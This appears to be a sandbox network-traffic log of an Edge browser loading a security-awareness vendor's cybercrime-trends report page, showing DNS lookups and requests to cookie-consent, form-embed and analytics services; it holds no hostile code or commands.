report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u57ujxEDk8HZFzrLXNyZ7aaFw6VhQrd29EZALjjAMEoBfKOm3k5YfCZcxG5syWDm144dQ98COAJr8QshX1Xxk9WTDI5Xet4yZ2Ss6lP9Yf8UpIhhTaXfmaAuA8UgxFK%2B%2Be%2FsCK%2Fl"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestconsent.cookiebot.comIN AResponseconsent.cookiebot.comIN CNAMEconsent.cookiebot.com-v2.edgekey.netconsent.cookiebot.com-v2.edgekey.netIN CNAMEe110990.dsca.akamaiedge.nete110990.dsca.akamaiedge.netIN A23.48.165.141e110990.dsca.akamaiedge.netIN A23.48.165.152
-
Remote address:8.8.8.8:53Requestconsent.cookiebot.comIN A
-
Remote address:8.8.8.8:53Requestjs.hsforms.netIN AResponsejs.hsforms.netIN A104.16.139.206js.hsforms.netIN A104.16.136.206js.hsforms.netIN A104.16.140.206js.hsforms.netIN A104.16.137.206js.hsforms.netIN A104.16.138.206
-
Remote address:8.8.8.8:53Request42.135.159.162.in-addr.arpaIN PTRResponse
-
Remote address:104.16.139.206:443RequestGET /forms/embed/v2.js HTTP/2.0
host: js.hsforms.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript; charset=utf-8
x-amz-replication-status: COMPLETED
last-modified: Thu, 29 Feb 2024 15:14:22 UTC
x-amz-server-side-encryption: AES256
x-amz-version-id: 9d7EqS.wP16C3hZhn1hsKrzc1cSTV7NB
etag: W/"9485dc4b1fa9efefba4862f8a0581794"
vary: Accept-Encoding
x-cache: Hit from cloudfront
via: 1.1 c0b0d7167cc2eb52d8d154aa7fc03a0a.cloudfront.net (CloudFront)
x-amz-cf-pop: IAD12-P3
x-amz-cf-id: 8zqwqbRhldXev-KrQcRaHxQa1R4uinpx4-NG9BvhU-FCeo2oIQmxMg==
age: 451
content-security-policy-report-only: frame-ancestors 'self'; report-uri https://send.hsbrowserreports.com/csp/report?resource=forms-embed/static-1.4774/bundles/project-v2.js&cfRay=85d1eac33e7568e7-LHR
cache-control: s-maxage=600, max-age=300
x-hs-target-asset: forms-embed/static-1.4774/bundles/project-v2.js
x-content-type-options: nosniff
access-control-allow-origin: *
x-hs-cache-status: HIT
x-envoy-upstream-service-time: 10
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-evy-trace-served-by-pod: iad02/app-td/envoy-proxy-576f9d768-nnhlv
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-hubspot-correlation-id: 0039fb82-cd62-40a5-93b0-344827d7c45d
x-request-id: 0039fb82-cd62-40a5-93b0-344827d7c45d
cache-tag: staticjsapp-forms-embed-v2-web-prod,staticjsapp-prod
cf-cache-status: HIT
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cYDvX4gne4lIxsTMq%2FfI1MxHo06QvvvA4dYgtyjhb%2BofwW2fgUkYOjelWPIC53y31StZqPK2fLKzuF0peNpvqUpVBk1%2BNKOGlQaTLpSLcGLB%2F9GHmCNrEFAj9uwSW3cF"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server: cloudflare
cf-ray: 85d1f5ca3a92499a-LHR
content-encoding: br
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestcdn.matomo.cloudIN AResponsecdn.matomo.cloudIN A13.225.239.115cdn.matomo.cloudIN A13.225.239.112cdn.matomo.cloudIN A13.225.239.5cdn.matomo.cloudIN A13.225.239.91
-
Remote address:13.225.239.115:443RequestGET /sosafeawareness.matomo.cloud/matomo.js HTTP/2.0
host: cdn.matomo.cloud
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript; charset=utf-8
date: Thu, 29 Feb 2024 12:43:59 GMT
x-amz-replication-status: COMPLETED
last-modified: Sun, 18 Feb 2024 22:15:06 GMT
etag: W/"a7f98c3215db29396510f5dcffabbd67"
cache-control: max-age=691200
x-amz-version-id: r1DGWUFn9SphQsxd9oDHjI3LWamoEUh5
content-encoding: gzip
vary: Accept-Encoding
x-cache: Hit from cloudfront
via: 1.1 8586a85c12ddfad3096d554af46e9972.cloudfront.net (CloudFront)
x-amz-cf-pop: BRU50-C1
x-amz-cf-id: 4q3W__d6DezIjjrkoajlrwM_L_ezTG6qwJK2-zAHF3O0r3Xy4m-cLQ==
age: 10110
strict-transport-security: max-age=31536000
-
Remote address:23.48.165.141:443RequestGET /uc.js HTTP/2.0
host: consent.cookiebot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-encoding: gzip
last-modified: Thu, 29 Feb 2024 08:37:16 GMT
accept-ranges: bytes
etag: "415c680ea6ada1:0"
vary: Accept-Encoding
request-context: appId=cid-v1:89f47f4b-bed0-4db8-956b-d6e6dfac3fef
access-control-expose-headers: Request-Context
content-length: 34338
cache-control: public, max-age=148
expires: Thu, 29 Feb 2024 15:34:56 GMT
date: Thu, 29 Feb 2024 15:32:28 GMT
cross-origin-resource-policy: cross-origin
-
GEThttps://consent.cookiebot.com/9342a10a-36bc-4a36-99a3-f105675e7f78/cc.js?renew=false&referer=sosafe-awareness.com&dnt=true&init=falsemsedge.exeRemote address:23.48.165.141:443RequestGET /9342a10a-36bc-4a36-99a3-f105675e7f78/cc.js?renew=false&referer=sosafe-awareness.com&dnt=true&init=false HTTP/2.0
host: consent.cookiebot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/x-javascript; charset=utf-8
content-encoding: gzip
last-modified: Thu, 29 Feb 2024 15:32:28 GMT
vary: Accept-Encoding
request-context: appId=cid-v1:89f47f4b-bed0-4db8-956b-d6e6dfac3fef
access-control-expose-headers: Request-Context
content-length: 156
date: Thu, 29 Feb 2024 15:32:28 GMT
cross-origin-resource-policy: cross-origin
-
Remote address:8.8.8.8:53Requestforms.hsforms.comIN AResponseforms.hsforms.comIN A104.18.160.125forms.hsforms.comIN A104.18.176.125forms.hsforms.comIN A104.17.239.249forms.hsforms.comIN A104.18.192.125forms.hsforms.comIN A104.17.207.249
-
Remote address:8.8.8.8:53Request97.203.85.209.in-addr.arpaIN PTRResponse97.203.85.209.in-addr.arpaIN PTRdh-in-f971e100net
-
Remote address:8.8.8.8:53Request115.239.225.13.in-addr.arpaIN PTRResponse115.239.225.13.in-addr.arpaIN PTRserver-13-225-239-115bru50r cloudfrontnet
-
Remote address:8.8.8.8:53Request141.165.48.23.in-addr.arpaIN PTRResponse141.165.48.23.in-addr.arpaIN PTRa23-48-165-141deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request42.239.225.13.in-addr.arpaIN PTRResponse42.239.225.13.in-addr.arpaIN PTRserver-13-225-239-42bru50r cloudfrontnet
-
Remote address:8.8.8.8:53Request206.139.16.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestconsentcdn.cookiebot.comIN AResponseconsentcdn.cookiebot.comIN CNAMEconsentcdn.cookiebot.com-v1.edgekey.netconsentcdn.cookiebot.com-v1.edgekey.netIN CNAMEe3849.dsca.akamaiedge.nete3849.dsca.akamaiedge.netIN A104.84.69.31
-
Remote address:8.8.8.8:53Requestsosafeawareness.matomo.cloudIN AResponsesosafeawareness.matomo.cloudIN A18.195.235.189sosafeawareness.matomo.cloudIN A3.126.133.169sosafeawareness.matomo.cloudIN A18.157.122.248
-
GEThttps://forms.hsforms.com/embed/v3/form/8858700/3e5bc83a-1db9-4cbc-a714-816d21b3786f/json?hs_static_app=forms-embed&hs_static_app_version=1.4774&X-HubSpot-Static-App-Info=forms-embed-1.4774msedge.exeRemote address:104.18.160.125:443RequestGET /embed/v3/form/8858700/3e5bc83a-1db9-4cbc-a714-816d21b3786f/json?hs_static_app=forms-embed&hs_static_app_version=1.4774&X-HubSpot-Static-App-Info=forms-embed-1.4774 HTTP/1.1
Host: forms.hsforms.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Accept: application/json, text/plain, */*
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Origin: https://sosafe-awareness.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Type: application/json;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Trace: 2B09216B373CB0247A2552DC69CF6E1AB5A4006BD2000000000000000000
X-Origin-Hublet: na1
Vary: origin
Access-Control-Allow-Origin: https://sosafe-awareness.com
Access-Control-Allow-Methods: OPTIONS, GET
Access-Control-Allow-Headers: *
Access-Control-Allow-Credentials: false
Access-Control-Max-Age: 180
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-Origin-Hublet
Cache-Control: max-age=0, no-cache, no-store
X-Robots-Tag: none
x-envoy-upstream-service-time: 22
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-evy-trace-served-by-pod: iad02/star-hubspot-td/envoy-proxy-bfd765d7d-z8vxw
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
X-HubSpot-Correlation-Id: fe78f9c1-3e26-4434-bee7-efb292cc8ffc
x-request-id: fe78f9c1-3e26-4434-bee7-efb292cc8ffc
CF-Cache-Status: DYNAMIC
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Set-Cookie: _cfuvid=G87U9NaWXr6uUT246OMMSHvHmTZe1ygoL7nGCAGYY4s-1709220749011-0.0-604800000; path=/; domain=.hsforms.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85d1f5d07b926527-LHR
Content-Encoding: br
alt-svc: h3=":443"; ma=86400
-
GEThttps://sosafeawareness.matomo.cloud/plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=KkJOX7&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threatsmsedge.exeRemote address:18.195.235.189:443RequestGET /plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=KkJOX7&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats HTTP/2.0
host: sosafeawareness.matomo.cloud
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
content-length: 119
server: Apache
vary: X-Forwarded-Port-Override,X-Forwarded-Proto-Override,Accept-Encoding,User-Agent
content-encoding: gzip
-
GEThttps://sosafeawareness.matomo.cloud/plugins/HeatmapSessionRecording/configs.php?idsite=4&trackerid=etRRke&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threatsmsedge.exeRemote address:18.195.235.189:443RequestGET /plugins/HeatmapSessionRecording/configs.php?idsite=4&trackerid=etRRke&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats HTTP/2.0
host: sosafeawareness.matomo.cloud
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
content-length: 119
server: Apache
vary: X-Forwarded-Port-Override,X-Forwarded-Proto-Override,Accept-Encoding,User-Agent
content-encoding: gzip
-
POSThttps://sosafeawareness.matomo.cloud/matomo.php?action_name=Cybercrime%20Trends%202024%20%7C%20Report&idsite=3&rec=1&r=843940&h=15&m=32&s=26&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=c9715e882b41a221&_idn=1&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=THCnEn&pf_net=142&pf_srv=516&pf_tfr=3&pf_dm1=611&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720msedge.exeRemote address:18.195.235.189:443RequestPOST /matomo.php?action_name=Cybercrime%20Trends%202024%20%7C%20Report&idsite=3&rec=1&r=843940&h=15&m=32&s=26&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=c9715e882b41a221&_idn=1&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=THCnEn&pf_net=142&pf_srv=516&pf_tfr=3&pf_dm1=611&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720 HTTP/2.0
host: sosafeawareness.matomo.cloud
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://sosafe-awareness.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 204
server: Apache
access-control-allow-origin: https://sosafe-awareness.com
access-control-allow-credentials: true
vary: X-Forwarded-Port-Override,X-Forwarded-Proto-Override,User-Agent
-
POSThttps://sosafeawareness.matomo.cloud/matomo.php?action_name=Cybercrime%20Trends%202024%20%7C%20Report&idsite=4&rec=1&r=906109&h=15&m=32&s=26&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=5386e3a2dcbb0558&_idn=1&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=86Faos&pf_net=142&pf_srv=516&pf_tfr=3&pf_dm1=611&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720msedge.exeRemote address:18.195.235.189:443RequestPOST /matomo.php?action_name=Cybercrime%20Trends%202024%20%7C%20Report&idsite=4&rec=1&r=906109&h=15&m=32&s=26&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=5386e3a2dcbb0558&_idn=1&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=86Faos&pf_net=142&pf_srv=516&pf_tfr=3&pf_dm1=611&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720 HTTP/2.0
host: sosafeawareness.matomo.cloud
content-length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-www-form-urlencoded; charset=utf-8
accept: */*
origin: https://sosafe-awareness.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://sosafe-awareness.com/resources/reports/cybercrime-trends/?utm_term=Cyber%20threat&utm_campaign=UKI_EN_Non-branded_Q12023&utm_source=bing&utm_medium=paid&hsa_acc=2315609737&hsa_cam=19566844529&hsa_grp=1170981718251103&hsa_ad=&hsa_src=o&hsa_tgt=kwd-73187050925940:loc-188&hsa_kw=Cyber%20threat&hsa_mt=p&hsa_net=adwords&hsa_ver=3&msclkid=0be5aded059518b58e19c80da6f10d66&utm_content=Cyber%20threats
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 204
server: Apache
access-control-allow-origin: https://sosafe-awareness.com
access-control-allow-credentials: true
vary: X-Forwarded-Port-Override,X-Forwarded-Proto-Override,User-Agent
-
POSThttps://sosafeawareness.matomo.cloud/matomo.php?e_c=abtesting&e_a=CCT24selfattribution&e_n=original&ca=1&idsite=3&rec=1&r=133034&h=15&m=32&s=26&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=c9715e882b41a221&_idn=0&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=THCnEn&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720msedge.exeRemote address:18.195.235.189:443RequestPOST 